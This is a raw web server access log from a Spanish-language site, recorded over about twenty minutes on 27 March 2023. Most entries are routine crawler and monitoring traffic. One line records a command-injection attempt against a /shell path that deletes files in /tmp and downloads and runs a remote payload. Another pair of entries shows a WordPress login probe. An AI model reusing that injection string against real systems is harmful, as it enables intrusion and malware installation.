192.168.175.240 - - [27/Mar/2023:02:46:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:02:47:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:02:47:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:02:48:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:47:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:02:49:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:02:49:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2023:02:48:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
52.167.144.167 - - [27/Mar/2023:02:50:16 -0500] "GET / HTTP/1.1" 200 319
192.168.175.240 - - [27/Mar/2023:02:50:16 -0500] "GET / HTTP/1.1" 200 4720
172.113.139.152 - - [27/Mar/2023:02:50:36 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
192.168.175.240 - - [27/Mar/2023:02:51:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:02:52:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:02:52:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:02:53:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:02:54:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:02:54:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2023:02:53:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:02:55:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:54:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53551
192.168.175.240 - - [27/Mar/2023:02:56:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:56:27 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
192.168.175.240 - - [27/Mar/2023:02:57:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Mar/2023:02:57:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [27/Mar/2023:02:58:16 -0500] "GET / HTTP/1.1" 200 4720
157.55.39.217 - - [27/Mar/2023:02:58:36 -0500] "GET /BLA/resoluciones/AUTOS%202019/1431.pdf HTTP/1.1" 200 261728
192.168.175.240 - - [27/Mar/2023:02:59:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:02:59:52 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:03:00:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:02:59:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [27/Mar/2023:03:01:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:03:00:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52316
34.77.199.190 - - [27/Mar/2023:03:02:16 -0500] "GET / HTTP/1.1" 200 319
192.168.175.240 - - [27/Mar/2023:03:02:16 -0500] "GET / HTTP/1.1" 200 4720
34.91.208.242 - - [27/Mar/2023:03:02:55 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
201.245.192.253 - - [27/Mar/2023:03:02:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
157.55.39.217 - - [27/Mar/2023:03:03:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/4484.pdf HTTP/1.1" 304 -
192.168.175.240 - - [27/Mar/2023:03:03:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [27/Mar/2023:03:04:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [27/Mar/2023:03:04:51 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.106 - - [27/Mar/2023:03:05:07 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
217.45.173.31 - - [27/Mar/2023:03:05:08 -0500] "GET / HTTP/1.1" 200 319
185.119.81.106 - - [27/Mar/2023:03:05:08 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
192.168.175.240 - - [27/Mar/2023:03:05:16 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.111 - - [27/Mar/2023:03:05:27 -0500] "-" 408 -
192.168.175.240 - - [27/Mar/2023:03:06:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Mar/2023:03:05:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.167 - - [27/Mar/2023:03:07:07 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2023%2F HTTP/1.1" 200 10548
192.168.175.240 - - [27/Mar/2023:03:07:16 -0500] "GET / HTTP/1.1" 200 4720
